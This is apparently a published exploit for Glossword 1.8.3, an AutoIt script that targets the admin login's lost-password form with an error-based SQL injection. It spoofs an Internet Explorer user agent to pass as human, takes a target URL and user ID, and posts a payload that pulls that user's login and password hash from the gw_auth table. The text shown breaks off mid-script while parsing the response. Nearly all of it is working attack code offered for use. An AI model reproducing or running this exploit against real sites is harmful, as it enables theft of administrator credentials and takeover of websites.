#cs
==============================================================
Vulnerable Software: Glossword 1.8.3
Official site: http://sourceforge.net/projects/glossword/
Download: http://sourceforge.net/projects/glossword/files/glossword/1.8.3/
Vuln: SQLi
==================THIS IS A WHOLE EXPLOIT=====================
Exploit Coded In AutoIT.
To exploit this vulnerability magic_quotes_gpc must be turned off on server side.
Print screen: http://s004.radikal.ru/i206/1302/89/d7398ade1cd7.png
POC video: http://youtu.be/55IaNTQS3Fk
$method='POST';
$vulnurl='gw_admin/login.php'
Global $sessid=0
$cmsindent='lossword'; # We will use it to identify CMS #;
$adminpanel=$vulnurl
;#~ Impersonate that We Are Not BOT or exploit.We are human who uses IE.# ~;
$useragent='Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SV1; .NET CLR 1.1.4325)';
$msg_usage="Command Line Plizzzz => " & @CRLF & "Usage: " & @ScriptName & ' http://site.tld ' & ' /installdir/ ' & ' UID (int)' & @CRLF
if $CmdLine[0] <> 3 Then
ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF);
MsgBox(64,"",$msg_usage);
exit;
EndIf
if $CmdLine[0]=3 Then
$targetsite=$CmdLine[1];
$installdir=$CmdLine[2];
$uidtoattack=Number(StringMid($CmdLine[3],1,255));
EndIf
if not StringIsDigit($uidtoattack) Then
ConsoleWrite(' UID is wrong! Exit' );
Exit;
EndIf
if StringStripWS($targetsite,8)='' OR StringStripWS($installdir,8)='' Then
ConsoleWrite('Are you kidding meeeeen?');
Exit;
EndIf
HttpSetUserAgent($useragent)
$doublecheck=InetGet($targetsite,'',1);
if @error Then
ConsoleWrite('[*] Incorrect Domain Name/Or you are Offline! [*]' & @CRLF)
Exit;
EndIf
Func exploit($targetsite,$installdir,$sessid)
Global $sAddress = $targetsite
Global $PAYLOADTOSEND ="arPost[user_name]=') AND (select floor(rand(0)*2) from(select count(*)," & _
"concat((select concat(0x3C73696B6469723E,login,0x7c,password,0x3C2F73696B6469723E,0x7c) from " & _
"gw_auth where id_auth=" & $uidtoattack & "),floor(rand(0)*2))x from information_schema.tables group by x)a)-- " & _
" AND 1=('1&arPost[user_email]=trueownage&a=lostpass&sid=" & $sessid & "&post=Send password";
Global $sDomain = $targetsite
Global $sPage = $installdir & $vulnurl
Global $sAdditionalData = $PAYLOADTOSEND
Global $hOpen = _WinHttpOpen($useragent)
Global $hConnect = _WinHttpConnect($hOpen, $sDomain)
Global $hRequest = _WinHttpOpenRequest($hConnect, "POST", $sPage, -1, -1, -1, '')
_WinHttpSendRequest($hRequest, "Content-Type: application/x-www-form-urlencoded", $sAdditionalData)
_WinHttpReceiveResponse($hRequest)
Global $sReturned
If _WinHttpQueryDataAvailable($hRequest) Then
Do
$sReturned &= _WinHttpReadData($hRequest)
Until @error
if StringInStr($sReturned,'<sikdir>') and StringInStr($sReturned,'</sikdir>') Then